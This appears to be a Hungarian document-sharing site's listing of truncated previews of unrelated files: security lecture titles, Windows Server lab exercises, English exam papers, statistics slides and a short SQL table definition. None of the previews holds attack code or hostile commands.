Adatbiztonság a gazaságinformatikában Adatbiztonság a gazaságinformatikában 2011. november 19. Budapest Dr. Bencsáth Boldizsár adjunktus BME Híradástechnikai Tanszék bencsath@crysys.hit.bme.hu Network vulnerability scanners Target: A system,

Részletesebben

Using the CW-Net in a user defined IP network

Using the CW-Net in a user defined IP network Using the CW-Net in a user defined IP network Data transmission and device control through IP platform CW-Net Basically, CableWorld's CW-Net operates in the 10.123.13.xxx IP address range. User Defined

Részletesebben

Adatbiztonság. Botnet, Malware. Dr. Bencsáth Boldizsár. adjunktus BME Hálózati Rendszerek és Szolgáltatások Tanszék bencsath@crysys.hit.bme.

Adatbiztonság. Botnet, Malware. Dr. Bencsáth Boldizsár. adjunktus BME Hálózati Rendszerek és Szolgáltatások Tanszék bencsath@crysys.hit.bme. Adatbiztonság Botnet, Malware 2013. március 7. Budapest Dr. Bencsáth Boldizsár adjunktus BME Hálózati Rendszerek és Szolgáltatások Tanszék bencsath@crysys.hit.bme.hu Malware malicious and software software

Részletesebben

Angol Középfokú Nyelvvizsgázók Bibliája: Nyelvtani összefoglalás, 30 kidolgozott szóbeli tétel, esszé és minta levelek + rendhagyó igék jelentéssel

Angol Középfokú Nyelvvizsgázók Bibliája: Nyelvtani összefoglalás, 30 kidolgozott szóbeli tétel, esszé és minta levelek + rendhagyó igék jelentéssel Angol Középfokú Nyelvvizsgázók Bibliája: Nyelvtani összefoglalás, 30 kidolgozott szóbeli tétel, esszé és minta levelek + rendhagyó igék jelentéssel Timea Farkas Click here if your download doesn"t start

Részletesebben

1. Gyakorlat: Telepítés: Windows Server 2008 R2 Enterprise, Core, Windows 7

1. Gyakorlat: Telepítés: Windows Server 2008 R2 Enterprise, Core, Windows 7 1. Gyakorlat: Telepítés: Windows Server 2008 R2 Enterprise, Core, Windows 7 1.1. Új virtuális gép és Windows Server 2008 R2 Enterprise alap lemez létrehozása 1.2. A differenciális lemezek és a két új virtuális

Részletesebben

Adatbiztonság a gazaságinformatikában

Adatbiztonság a gazaságinformatikában Adatbiztonság a gazaságinformatikában Assessment, terms, info gathering 2014. szeptember 30. Budapest Dr. Bencsáth Boldizsár adjunktus BME Híradástechnikai Tanszék bencsath@crysys.hit.bme.hu 1. Security

Részletesebben

Proxer 7 Manager szoftver felhasználói leírás

Proxer 7 Manager szoftver felhasználói leírás Proxer 7 Manager szoftver felhasználói leírás A program az induláskor elkezdi keresni az eszközöket. Ha van olyan eszköz, amely virtuális billentyűzetként van beállítva, akkor azokat is kijelzi. Azokkal

Részletesebben

Ellenőrző lista. 2. Hálózati útvonal beállítások, kapcsolatok, névfeloldások ellenőrzése: WebEC és BKPR URL-k kliensről történő ellenőrzése.

Ellenőrző lista. 2. Hálózati útvonal beállítások, kapcsolatok, névfeloldások ellenőrzése: WebEC és BKPR URL-k kliensről történő ellenőrzése. Ellenőrző lista 1. HW/SW rendszer követelmények meglétének ellenőrzése: A telepítési segédlet által megjelölt elemek meglétének, helyes üzemének ellenőrzése. 2. Hálózati útvonal beállítások, kapcsolatok,

Részletesebben

SOPHOS simple + secure. A dobozba rejtett biztonság UTM 9. Kókai Gábor - Sophos Advanced Engineer Balogh Viktor - Sophos Architect SOPHOS

SOPHOS simple + secure. A dobozba rejtett biztonság UTM 9. Kókai Gábor - Sophos Advanced Engineer Balogh Viktor - Sophos Architect SOPHOS SOPHOS simple + secure A dobozba rejtett biztonság UTM 9 Kókai Gábor - Sophos Advanced Engineer Balogh Viktor - Sophos Architect SOPHOS SOPHOS simple + secure Megint egy UTM? Egy újabb tűzfal extrákkal?

Részletesebben

Teszt topológia E1/1 E1/0 SW1 E1/0 E1/0 SW3 SW2. Kuris Ferenc - [HUN] Cisco Blog -

Teszt topológia E1/1 E1/0 SW1 E1/0 E1/0 SW3 SW2. Kuris Ferenc - [HUN] Cisco Blog - VTP Teszt topológia E1/1 E1/0 SW1 E1/0 E1/0 SW2 SW3 2 Alap konfiguráció SW1-2-3 conf t interface e1/0 switchport trunk encapsulation dot1q switchport mode trunk vtp domain CCIE vtp mode transparent vtp

Részletesebben

4. Gyakorlat: Csoportházirend beállítások

4. Gyakorlat: Csoportházirend beállítások 4. Gyakorlat: Csoportházirend beállítások 4.1. A Default Domain Policy jelszóra vonatkozó beállításai 4.2. Parancsikon, mappa és hálózati meghajtó megjelenítése csoport házirend segítségével 4.3. Alkalmazások

Részletesebben

ANGOL NYELV KÖZÉPSZINT SZÓBELI VIZSGA I. VIZSGÁZTATÓI PÉLDÁNY

ANGOL NYELV KÖZÉPSZINT SZÓBELI VIZSGA I. VIZSGÁZTATÓI PÉLDÁNY ANGOL NYELV KÖZÉPSZINT SZÓBELI VIZSGA I. VIZSGÁZTATÓI PÉLDÁNY A feladatsor három részbol áll 1. A vizsgáztató társalgást kezdeményez a vizsgázóval. 2. A vizsgázó egy szituációs feladatban vesz részt a

Részletesebben

11. Gyakorlat: Certificate Authority (CA), FTP site-ok

11. Gyakorlat: Certificate Authority (CA), FTP site-ok 11. Gyakorlat: Certificate Authority (CA), FTP site-ok 11.1. A CA szerver szerepkör telepítése a DC01-es szerverre 11.2. Az FTP szervíz telepítése a DC01-es szerverre 11.3. A szükséges DNS rekordok létrehozása

Részletesebben

Széchenyi István Egyetem www.sze.hu/~herno

Széchenyi István Egyetem www.sze.hu/~herno Oldal: 1/6 A feladat során megismerkedünk a C# és a LabVIEW összekapcsolásának egy lehetőségével, pontosabban nagyon egyszerű C#- ban írt kódból fordítunk DLL-t, amit meghívunk LabVIEW-ból. Az eljárás

Részletesebben

USER MANUAL Guest user

USER MANUAL Guest user USER MANUAL Guest user 1 Welcome in Kutatótér (Researchroom) Top menu 1. Click on it and the left side menu will pop up 2. With the slider you can make left side menu visible 3. Font side: enlarging font

Részletesebben

ANGOL NYELV KÖZÉPSZINT SZÓBELI VIZSGA I. VIZSGÁZTATÓI PÉLDÁNY

ANGOL NYELV KÖZÉPSZINT SZÓBELI VIZSGA I. VIZSGÁZTATÓI PÉLDÁNY ANGOL NYELV KÖZÉPSZINT SZÓBELI VIZSGA I. VIZSGÁZTATÓI PÉLDÁNY A feladatsor három részből áll 1. A vizsgáztató társalgást kezdeményez a vizsgázóval. 2. A vizsgázó egy szituációs feladatban vesz részt a

Részletesebben

Correlation & Linear Regression in SPSS

Correlation & Linear Regression in SPSS Petra Petrovics Correlation & Linear Regression in SPSS 4 th seminar Types of dependence association between two nominal data mixed between a nominal and a ratio data correlation among ratio data Correlation

Részletesebben

10. Gyakorlat: Alkalmazások publikálása Remote Desktop Szervízen keresztül

10. Gyakorlat: Alkalmazások publikálása Remote Desktop Szervízen keresztül 10. Gyakorlat: Alkalmazások publikálása Remote Desktop Szervízen keresztül 10.1. Jogosultságok és csoportok létrehozása 10.2. Az RDS szerver szerepkör telepítése a DC01-es szerverre 10.3. Az RDS01-es szerver

Részletesebben

(NGB_TA024_1) MÉRÉSI JEGYZŐKÖNYV

(NGB_TA024_1) MÉRÉSI JEGYZŐKÖNYV Kommunikációs rendszerek programozása (NGB_TA024_1) MÉRÉSI JEGYZŐKÖNYV (5. mérés) SIP telefonközpont készítése Trixbox-szal 1 Mérés helye: Széchenyi István Egyetem, L-1/7 laboratórium, 9026 Győr, Egyetem

Részletesebben

Cloud computing. Cloud computing. Dr. Bakonyi Péter.

Cloud computing. Cloud computing. Dr. Bakonyi Péter. Cloud computing Cloud computing Dr. Bakonyi Péter. 1/24/2011 1/24/2011 Cloud computing 2 Cloud definició A cloud vagy felhő egy platform vagy infrastruktúra Az alkalmazások és szolgáltatások végrehajtására

Részletesebben

Phenotype. Genotype. It is like any other experiment! What is a bioinformatics experiment? Remember the Goal. Infectious Disease Paradigm

Phenotype. Genotype. It is like any other experiment! What is a bioinformatics experiment? Remember the Goal. Infectious Disease Paradigm It is like any other experiment! What is a bioinformatics experiment? You need to know your data/input sources You need to understand your methods and their assumptions You need a plan to get from point

Részletesebben

STUDENT LOGBOOK. 1 week general practice course for the 6 th year medical students SEMMELWEIS EGYETEM. Name of the student:

STUDENT LOGBOOK. 1 week general practice course for the 6 th year medical students SEMMELWEIS EGYETEM. Name of the student: STUDENT LOGBOOK 1 week general practice course for the 6 th year medical students Name of the student: Dates of the practice course: Name of the tutor: Address of the family practice: Tel: Please read

Részletesebben

Csatlakozás a BME eduroam hálózatához Setting up the BUTE eduroam network

Csatlakozás a BME eduroam hálózatához Setting up the BUTE eduroam network Csatlakozás a BME eduroam hálózatához Setting up the BUTE eduroam network Table of Contents Windows 7... 2 Windows 8... 6 Windows Phone... 11 Android... 12 iphone... 14 Linux (Debian)... 20 Sebők Márton

Részletesebben

Minta ANGOL NYELV KÖZÉPSZINT SZÓBELI VIZSGA II. Minta VIZSGÁZTATÓI PÉLDÁNY

Minta ANGOL NYELV KÖZÉPSZINT SZÓBELI VIZSGA II. Minta VIZSGÁZTATÓI PÉLDÁNY ANGOL NYELV KÖZÉPSZINT SZÓBELI VIZSGA II. A feladatsor három részből áll VIZSGÁZTATÓI PÉLDÁNY 1. A vizsgáztató társalgást kezdeményez a vizsgázóval. 2. A vizsgázó egy szituációs feladatban vesz részt a

Részletesebben

Adatbázis-kezelés ODBC driverrel

Adatbázis-kezelés ODBC driverrel ADATBÁZIS-KEZELÉS ODBC DRIVERREL... 1 ODBC: OPEN DATABASE CONNECTIVITY (NYÍLT ADATBÁZIS KAPCSOLÁS)... 1 AZ ODBC FELÉPÍTÉSE... 2 ADATBÁZIS REGISZTRÁCIÓ... 2 PROJEKT LÉTREHOZÁSA... 3 A GENERÁLT PROJEKT FELÉPÍTÉSE...

Részletesebben

Budapest By Vince Kiado, Klösz György

Budapest By Vince Kiado, Klösz György Budapest 1900 2000 By Vince Kiado, Klösz György Download Ebook : budapest 1900 2000 in PDF Format. also available for mobile reader If you are looking for a book Budapest 1900-2000 by Vince Kiado;Klosz

Részletesebben

A modern e-learning lehetőségei a tűzoltók oktatásának fejlesztésében. Dicse Jenő üzletfejlesztési igazgató

A modern e-learning lehetőségei a tűzoltók oktatásának fejlesztésében. Dicse Jenő üzletfejlesztési igazgató A modern e-learning lehetőségei a tűzoltók oktatásának fejlesztésében Dicse Jenő üzletfejlesztési igazgató How to apply modern e-learning to improve the training of firefighters Jenő Dicse Director of

Részletesebben

EN United in diversity EN A8-0206/419. Amendment

EN United in diversity EN A8-0206/419. Amendment 22.3.2019 A8-0206/419 419 Article 2 paragraph 4 point a point i (i) the identity of the road transport operator; (i) the identity of the road transport operator by means of its intra-community tax identification

Részletesebben

Cloud computing Dr. Bakonyi Péter.

Cloud computing Dr. Bakonyi Péter. Cloud computing Dr. Bakonyi Péter. 1/24/2011 Cloud computing 1/24/2011 Cloud computing 2 Cloud definició A cloud vagy felhő egy platform vagy infrastruktúra Az alkalmazások és szolgáltatások végrehajtására

Részletesebben

Számítógépes Hálózatok GY 8.hét

Számítógépes Hálózatok GY 8.hét Számítógépes Hálózatok GY 8.hét Laki Sándor ELTE-Ericsson Kommunikációs Hálózatok Laboratórium ELTE IK - Információs Rendszerek Tanszék lakis@elte.hu http://lakis.web.elte.hu Teszt 10 kérdés 10 perc canvas.elte.hu

Részletesebben

Miskolci Egyetem Gazdaságtudományi Kar Üzleti Információgazdálkodási és Módszertani Intézet. Correlation & Linear. Petra Petrovics.

Miskolci Egyetem Gazdaságtudományi Kar Üzleti Információgazdálkodási és Módszertani Intézet. Correlation & Linear. Petra Petrovics. Correlation & Linear Regression in SPSS Petra Petrovics PhD Student Types of dependence association between two nominal data mixed between a nominal and a ratio data correlation among ratio data Exercise

Részletesebben

FOSS4G-CEE Prágra, 2012 május. Márta Gergely Sándor Csaba

FOSS4G-CEE Prágra, 2012 május. Márta Gergely Sándor Csaba FOSS4G-CEE Prágra, 2012 május Márta Gergely Sándor Csaba Reklám helye 2009 óta Intergraph szoftverek felől jöttünk FOSS4G felé megyünk Békés egymás mellett élés több helyen: Geoshop.hu Terkep.torokbalint.hu

Részletesebben

12.2.2 Laborgyakorlat: A Windows XP haladó telepítése

12.2.2 Laborgyakorlat: A Windows XP haladó telepítése 12.2.2 Laborgyakorlat: A Windows XP haladó telepítése Bevezetés Nyomtasd ki a laborgyakorlatot és végezd el lépéseit! Ebben a laborgyakorlatban automatizálva fogjuk telepíteni a Windows XP Professional

Részletesebben

1. Ismerkedés a Hyper-V-vel, virtuális gépek telepítése és konfigurálása

1. Ismerkedés a Hyper-V-vel, virtuális gépek telepítése és konfigurálása 1. Ismerkedés a Hyper-V-vel, virtuális gépek telepítése és konfigurálása 1.1. Új virtuális gép és a Windows Server 2012 R2 Datacenter alap lemez létrehozása 1.2. A differenciális lemezek és a két új virtuális

Részletesebben

Website review acci.hu

Website review acci.hu Website review acci.hu Generated on September 30 2016 21:54 PM The score is 37/100 SEO Content Title Acci.hu - Ingyenes apróhirdető Length : 30 Perfect, your title contains between 10 and 70 characters.

Részletesebben

Lopocsi Istvánné MINTA DOLGOZATOK FELTÉTELES MONDATOK. (1 st, 2 nd, 3 rd CONDITIONAL) + ANSWER KEY PRESENT PERFECT + ANSWER KEY

Lopocsi Istvánné MINTA DOLGOZATOK FELTÉTELES MONDATOK. (1 st, 2 nd, 3 rd CONDITIONAL) + ANSWER KEY PRESENT PERFECT + ANSWER KEY Lopocsi Istvánné MINTA DOLGOZATOK FELTÉTELES MONDATOK (1 st, 2 nd, 3 rd CONDITIONAL) + ANSWER KEY PRESENT PERFECT + ANSWER KEY FELTÉTELES MONDATOK 1 st, 2 nd, 3 rd CONDITIONAL I. A) Egészítsd ki a mondatokat!

Részletesebben

Computer Architecture

Computer Architecture Computer Architecture Locality-aware programming 2016. április 27. Budapest Gábor Horváth associate professor BUTE Department of Telecommunications ghorvath@hit.bme.hu Számítógép Architektúrák Horváth

Részletesebben

++Buy( Kaspersky Anti- Virus 2014 top sites for computer software ]

++Buy( Kaspersky Anti- Virus 2014 top sites for computer software ] ++Buy( Kaspersky Anti- Virus 2014 top sites for computer software ] Description: Elonyök Védelem a rosszindulatú programok ellen Továbbfejlesztve! A Kaspersky Lab rosszindulatú programok elleni védelmet

Részletesebben

discosnp demo - Peterlongo Pierre 1 DISCOSNP++: Live demo

discosnp demo - Peterlongo Pierre 1 DISCOSNP++: Live demo discosnp demo - Peterlongo Pierre 1 DISCOSNP++: Live demo Download and install discosnp demo - Peterlongo Pierre 3 Download web page: github.com/gatb/discosnp Chose latest release (2.2.10 today) discosnp

Részletesebben

TestLine - Angol teszt Minta feladatsor

TestLine - Angol teszt Minta feladatsor Minta felaatsor venég Téma: Általános szintfelmérő Aláírás:... Dátum: 2016.05.29 08:18:49 Kérések száma: 25 kérés Kitöltési iő: 1:17:27 Nehézség: Összetett Pont egység: +6-2 Értékelés: Alaértelmezett értékelés

Részletesebben

ANGOL NYELVI SZINTFELMÉRŐ 2013 A CSOPORT. on of for from in by with up to at

ANGOL NYELVI SZINTFELMÉRŐ 2013 A CSOPORT. on of for from in by with up to at ANGOL NYELVI SZINTFELMÉRŐ 2013 A CSOPORT A feladatok megoldására 45 perc áll rendelkezésedre, melyből körülbelül 10-15 percet érdemes a levélírási feladatra szánnod. Sok sikert! 1. Válaszd ki a helyes

Részletesebben

Miskolci Egyetem Gazdaságtudományi Kar Üzleti Információgazdálkodási és Módszertani Intézet. Hypothesis Testing. Petra Petrovics.

Miskolci Egyetem Gazdaságtudományi Kar Üzleti Információgazdálkodási és Módszertani Intézet. Hypothesis Testing. Petra Petrovics. Hypothesis Testing Petra Petrovics PhD Student Inference from the Sample to the Population Estimation Hypothesis Testing Estimation: how can we determine the value of an unknown parameter of a population

Részletesebben

Correlation & Linear Regression in SPSS

Correlation & Linear Regression in SPSS Correlation & Linear Regression in SPSS Types of dependence association between two nominal data mixed between a nominal and a ratio data correlation among ratio data Exercise 1 - Correlation File / Open

Részletesebben

SQL/PSM kurzorok rész

SQL/PSM kurzorok rész SQL/PSM kurzorok --- 2.rész Tankönyv: Ullman-Widom: Adatbázisrendszerek Alapvetés Második, átdolgozott kiadás, Panem, 2009 9.3. Az SQL és a befogadó nyelv közötti felület (sormutatók) 9.4. SQL/PSM Sémában

Részletesebben

Mobil webszerverek. Márton Gábor Nokia Research Center. W3C Mobilweb Műhelykonferencia, Budapest 2006. október 18.

Mobil webszerverek. Márton Gábor Nokia Research Center. W3C Mobilweb Műhelykonferencia, Budapest 2006. október 18. Mobil webszerverek Márton Gábor Nokia Research Center W3C Mobilweb Műhelykonferencia, Budapest 2006. október 18. 1 2006 Nokia Mobil webszerverek / 2006-10-18 / JWi, GMa Előzmények Klassz lenne, ha a mobiltelefonon

Részletesebben

Utasítások. Üzembe helyezés

Utasítások. Üzembe helyezés HASZNÁLATI ÚTMUTATÓ Üzembe helyezés Utasítások Windows XP / Vista / Windows 7 / Windows 8 rendszerben történő telepítéshez 1 Töltse le az AORUS makróalkalmazás telepítőjét az AORUS hivatalos webhelyéről.

Részletesebben

Mérési útmutató a Secure Shell (SSH) controll és audit című méréshez

Mérési útmutató a Secure Shell (SSH) controll és audit című méréshez Mérési útmutató a Secure Shell (SSH) controll és audit című méréshez 2016. február A mérést kidolgozta: Höltzl Péter Balabit Europe Kft. BME, CrySyS Adat- és Rendszerbiztonság Laboratórium 1. Elméleti

Részletesebben

Performance Modeling of Intelligent Car Parking Systems

Performance Modeling of Intelligent Car Parking Systems Performance Modeling of Intelligent Car Parking Systems Károly Farkas Gábor Horváth András Mészáros Miklós Telek Technical University of Budapest, Hungary EPEW 2014, Florence, Italy Outline Intelligent

Részletesebben

ANGOL NYELVI SZINTFELMÉRŐ 2012 A CSOPORT. to into after of about on for in at from

ANGOL NYELVI SZINTFELMÉRŐ 2012 A CSOPORT. to into after of about on for in at from ANGOL NYELVI SZINTFELMÉRŐ 2012 A CSOPORT A feladatok megoldására 45 perc áll rendelkezésedre, melyből körülbelül 10-15 percet érdemes a levélírási feladatra szánnod. Sok sikert! 1. Válaszd ki a helyes

Részletesebben

Az Open Data jogi háttere. Dr. Telek Eszter

Az Open Data jogi háttere. Dr. Telek Eszter Az Open Data jogi háttere Dr. Telek Eszter Egy kis ismétlés Open Data/Open Access/Open Knowledge gyökerei Open Source Software FLOSS (Free Libre Open Source Software) Szoftver esetében egyszerű alapok:

Részletesebben

KN-CP50. MANUAL (p. 2) Digital compass. ANLEITUNG (s. 4) Digitaler Kompass. GEBRUIKSAANWIJZING (p. 10) Digitaal kompas

KN-CP50. MANUAL (p. 2) Digital compass. ANLEITUNG (s. 4) Digitaler Kompass. GEBRUIKSAANWIJZING (p. 10) Digitaal kompas KN-CP50 MANUAL (p. ) Digital compass ANLEITUNG (s. 4) Digitaler Kompass MODE D EMPLOI (p. 7) Boussole numérique GEBRUIKSAANWIJZING (p. 0) Digitaal kompas MANUALE (p. ) Bussola digitale MANUAL DE USO (p.

Részletesebben

9. Gyakorlat: Network Load Balancing (NLB)

9. Gyakorlat: Network Load Balancing (NLB) 9. Gyakorlat: Network Load Balancing (NLB) 9.1. Az NLB01 és az NLB02 szerverek létrehozása 9.2. Az NLB01 szerver konfigurálása 9.3. Az NLB02 szerver konfigurálása 9.4. Teszt weboldal létrehozása 9.5. Az

Részletesebben

Tudományos Ismeretterjesztő Társulat

Tudományos Ismeretterjesztő Társulat Sample letter number 5. International Culture Festival PO Box 34467 Harrogate HG 45 67F Sonnenbergstraße 11a CH-6005 Luzern Re: Festival May 19, 2009 Dear Ms Atkinson, We are two students from Switzerland

Részletesebben

3. MINTAFELADATSOR KÖZÉPSZINT. Az írásbeli vizsga időtartama: 30 perc. III. Hallott szöveg értése

3. MINTAFELADATSOR KÖZÉPSZINT. Az írásbeli vizsga időtartama: 30 perc. III. Hallott szöveg értése Oktatáskutató és Fejlesztő Intézet TÁMOP-3.1.1-11/1-2012-0001 XXI. századi közoktatás (fejlesztés, koordináció) II. szakasz ANGOL NYELV 3. MINTAFELADATSOR KÖZÉPSZINT Az írásbeli vizsga időtartama: 30 perc

Részletesebben

ANGOL NYELVI SZINTFELMÉRŐ 2008 A CSOPORT

ANGOL NYELVI SZINTFELMÉRŐ 2008 A CSOPORT ANGOL NYELVI SZINTFELMÉRŐ 2008 A CSOPORT A feladatok megoldására 60 perc áll rendelkezésedre, melyből körülbelül 15 percet érdemes a levélírási feladatra szánnod. Sok sikert! 1. Válaszd ki a helyes megoldást.

Részletesebben

Hálózatbiztonság a. Actual problems, Web vulnerabilities XSS, SQL injection, port scanning: zombie scan. Dr. Bencsáth Boldizsár

Hálózatbiztonság a. Actual problems, Web vulnerabilities XSS, SQL injection, port scanning: zombie scan. Dr. Bencsáth Boldizsár Hálózatbiztonság a gyakorlatban BMEVIHIM327 Actual problems, Web vulnerabilities XSS, SQL injection, port scanning: zombie scan 2015. május 22. Budapest Dr. Bencsáth Boldizsár adjunktus BME Híradástechnikai

Részletesebben

Tudományos Ismeretterjesztő Társulat

Tudományos Ismeretterjesztő Társulat Sample letter number 3. Russell Ltd. 57b Great Hawthorne Industrial Estate Hull East Yorkshire HU 19 5BV 14 Bebek u. Budapest H-1105 10 December, 2009 Ref.: complaint Dear Sir/Madam, After seeing your

Részletesebben

EXKLUZÍV AJÁNDÉKANYAGOD A Phrasal Verb hadsereg! 2. rész

EXKLUZÍV AJÁNDÉKANYAGOD A Phrasal Verb hadsereg! 2. rész A Phrasal Verb hadsereg! 2. rész FONTOS! Ha ennek az ajándékanyag sorozatnak nem láttad az 1. részét, akkor mindenképpen azzal kezdd! Fekete Gábor www.goangol.hu A sorozat 1. részét itt éred el: www.goangol.hu/ajandekok/phrasalverbs

Részletesebben

PromoCoder_7031/Lx3 rendszer használati utsítás v1.1

PromoCoder_7031/Lx3 rendszer használati utsítás v1.1 PromoCoder_7031/Lx3 rendszer használati utsítás v1.1 A rendszer leírása a Promociós kódolás MI 7031 lézernyomtatókkal szerelt csomagológépekre című dokumentumban került részletes ismertetésre. Ebben lett

Részletesebben

Cluster Analysis. Potyó László

Cluster Analysis. Potyó László Cluster Analysis Potyó László What is Cluster Analysis? Cluster: a collection of data objects Similar to one another within the same cluster Dissimilar to the objects in other clusters Cluster analysis

Részletesebben

Lexington Public Schools 146 Maple Street Lexington, Massachusetts 02420

Lexington Public Schools 146 Maple Street Lexington, Massachusetts 02420 146 Maple Street Lexington, Massachusetts 02420 Surplus Printing Equipment For Sale Key Dates/Times: Item Date Time Location Release of Bid 10/23/2014 11:00 a.m. http://lps.lexingtonma.org (under Quick

Részletesebben

ENGLISH 24 English is fun Letter #1 Letters In the age of e-mails and cell phones writing a letter might seem out of fashion. However, learners of a foreign language should know how to do it. Here you

Részletesebben

On The Number Of Slim Semimodular Lattices

On The Number Of Slim Semimodular Lattices On The Number Of Slim Semimodular Lattices Gábor Czédli, Tamás Dékány, László Ozsvárt, Nóra Szakács, Balázs Udvari Bolyai Institute, University of Szeged Conference on Universal Algebra and Lattice Theory

Részletesebben

Eladni könnyedén? Oracle Sales Cloud. Horváth Tünde Principal Sales Consultant 2014. március 23.

Eladni könnyedén? Oracle Sales Cloud. Horváth Tünde Principal Sales Consultant 2014. március 23. Eladni könnyedén? Oracle Sales Cloud Horváth Tünde Principal Sales Consultant 2014. március 23. Oracle Confidential Internal/Restricted/Highly Restricted Safe Harbor Statement The following is intended

Részletesebben

Unit 10: In Context 55. In Context. What's the Exam Task? Mediation Task B 2: Translation of an informal letter from Hungarian to English.

Unit 10: In Context 55. In Context. What's the Exam Task? Mediation Task B 2: Translation of an informal letter from Hungarian to English. Unit 10: In Context 55 UNIT 10 Mediation Task B 2 Hungarian into English In Context OVERVIEW 1. Hungarian and English in Context 2. Step By Step Exam Techniques Real World Link Students who have studied

Részletesebben

Miskolci Egyetem Gazdaságtudományi Kar Üzleti Információgazdálkodási és Módszertani Intézet Nonparametric Tests

Miskolci Egyetem Gazdaságtudományi Kar Üzleti Információgazdálkodási és Módszertani Intézet Nonparametric Tests Nonparametric Tests Petra Petrovics Hypothesis Testing Parametric Tests Mean of a population Population proportion Population Standard Deviation Nonparametric Tests Test for Independence Analysis of Variance

Részletesebben

Intézményi IKI Gazdasági Nyelvi Vizsga

Intézményi IKI Gazdasági Nyelvi Vizsga Intézményi IKI Gazdasági Nyelvi Vizsga Név:... Születési hely:... Születési dátum (év/hó/nap):... Nyelv: Angol Fok: Alapfok 1. Feladat: Olvasáskészséget mérő feladat 20 pont Olvassa el a szöveget és válaszoljon

Részletesebben

Decision where Process Based OpRisk Management. made the difference. Norbert Kozma Head of Operational Risk Control. Erste Bank Hungary

Decision where Process Based OpRisk Management. made the difference. Norbert Kozma Head of Operational Risk Control. Erste Bank Hungary Decision where Process Based OpRisk Management made the difference Norbert Kozma Head of Operational Risk Control Erste Bank Hungary About Erste Group 2010. 09. 30. 2 Erste Bank Hungary Erste Group entered

Részletesebben

XV1100K(C)/XV1100SK(C)

XV1100K(C)/XV1100SK(C) Lg C18ahr XV1100K(C)/XV1100SK(C) All rights reserverd. Any reprinting or unauthorized use wihout the written permission of Lg C18ahr Corporation, is expressly prohibited. P/N LIT-11646-12-51 1.1. INTRODUCTION

Részletesebben

T Á J É K O Z T A T Ó. A 1108INT számú nyomtatvány a http://www.nav.gov.hu webcímen a Letöltések Nyomtatványkitöltő programok fülön érhető el.

T Á J É K O Z T A T Ó. A 1108INT számú nyomtatvány a http://www.nav.gov.hu webcímen a Letöltések Nyomtatványkitöltő programok fülön érhető el. T Á J É K O Z T A T Ó A 1108INT számú nyomtatvány a http://www.nav.gov.hu webcímen a Letöltések Nyomtatványkitöltő programok fülön érhető el. A Nyomtatványkitöltő programok fület választva a megjelenő

Részletesebben

SAMBA. Forrás: Lajber Zoltán: SAMBA alapok dia, SZIE

SAMBA. Forrás: Lajber Zoltán: SAMBA alapok dia, SZIE Forrás: Lajber Zoltán: SAMBA alapok dia, SZIE https://www.samba.org Mi a SAMBA? Windows "Fájl és nyomtatómegosztás", illetve a "Microsoft Networks Kliens" szolgáltatásokat tartalmazó szoftvercsomag. NETBIOS

Részletesebben

A vitorlázás versenyszabályai a 2013-2016. évekre angol-magyar nyelvű kiadásának változási és hibajegyzéke

A vitorlázás versenyszabályai a 2013-2016. évekre angol-magyar nyelvű kiadásának változási és hibajegyzéke A vitorlázás versenyszabályai a 2013-2016. évekre angol-magyar nyelvű kiadásának változási és hibajegyzéke A dokumentum A vitorlázás versenyszabályai a 2013-2016. évekre angol-magyar nyelvű kiadásában

Részletesebben

Statistical Inference

Statistical Inference Petra Petrovics Statistical Inference 1 st lecture Descriptive Statistics Inferential - it is concerned only with collecting and describing data Population - it is used when tentative conclusions about

Részletesebben

Emelt szint SZÓBELI VIZSGA VIZSGÁZTATÓI PÉLDÁNY VIZSGÁZTATÓI. (A részfeladat tanulmányozására a vizsgázónak fél perc áll a rendelkezésére.

Emelt szint SZÓBELI VIZSGA VIZSGÁZTATÓI PÉLDÁNY VIZSGÁZTATÓI. (A részfeladat tanulmányozására a vizsgázónak fél perc áll a rendelkezésére. Emelt szint SZÓBELI VIZSGA VIZSGÁZTATÓI PÉLDÁNY VIZSGÁZTATÓI PÉLDÁNY A feladatsor három részből áll 1. A vizsgáztató társalgást kezdeményez a vizsgázóval. 2. A vizsgázó egy vita feladatban vesz részt a

Részletesebben

(Asking for permission) (-hatok/-hetek?; Szabad ni? Lehet ni?) Az engedélykérés kifejezésére a következő segédigéket használhatjuk: vagy vagy vagy

(Asking for permission) (-hatok/-hetek?; Szabad ni? Lehet ni?) Az engedélykérés kifejezésére a következő segédigéket használhatjuk: vagy vagy vagy (Asking for permission) (-hatok/-hetek?; Szabad ni? Lehet ni?) SEGÉDIGÉKKEL Az engedélykérés kifejezésére a következő segédigéket használhatjuk: vagy vagy vagy A fenti felsorolásban a magabiztosság/félénkség

Részletesebben

2. gyakorlat: Tartományvezérlő, DNS, tartományba léptetés, ODJ, Core változat konfigurálása, RODC

2. gyakorlat: Tartományvezérlő, DNS, tartományba léptetés, ODJ, Core változat konfigurálása, RODC 2. gyakorlat: Tartományvezérlő, DNS, tartományba léptetés, ODJ, Core változat konfigurálása, RODC 2.1. Tartományvezérlő és DNS szerver szerepkör hozzáadása a DC01-hez 2.2. Az SRV01 és a Client01 tartományba

Részletesebben

OLYMPICS! SUMMER CAMP

OLYMPICS! SUMMER CAMP OLYMPICS! SUMMER CAMP YOUNG BUSINESS CAMP 3D DESIGN CAMP OLYMPICS SUMMER CAMP 20 24 JUNE AND 27 JUNE 1 JULY AGE: 6-14 Our ESB native-speaking teachers will provide a strong English learning content throughout

Részletesebben

Szakmai továbbképzési nap akadémiai oktatóknak. 2012. december 14. HISZK, Hódmezővásárhely / Webex

Szakmai továbbképzési nap akadémiai oktatóknak. 2012. december 14. HISZK, Hódmezővásárhely / Webex Szakmai továbbképzési nap akadémiai oktatóknak 2012. december 14. HISZK, Hódmezővásárhely / Webex 14.00-15.00 15.00-15.30 15.30-15.40 Mai program 1. Amit feltétlenül ismernünk kell: az irányítótábla közelebbről.

Részletesebben

Genome 373: Hidden Markov Models I. Doug Fowler

Genome 373: Hidden Markov Models I. Doug Fowler Genome 373: Hidden Markov Models I Doug Fowler Review From Gene Prediction I transcriptional start site G open reading frame transcriptional termination site promoter 5 untranslated region 3 untranslated

Részletesebben

Nagios NSCA Indirect Monitoring, Passive Check

Nagios NSCA Indirect Monitoring, Passive Check Nagios NSCA Indirect Monitoring, Passive Check NSCA passzív monitoring Az NSCA-val végrehajtott passive check monitoringnak a lényege az ábrán jól látszódik. A központi Nagios nem küld (aktív) check parancsokat,

Részletesebben

CREATE TABLE student ( id int NOT NULL GENERATED ALWAYS AS IDENTITY PRIMARY KEY, name varchar(100) NOT NULL, address varchar(100) NOT NULL )

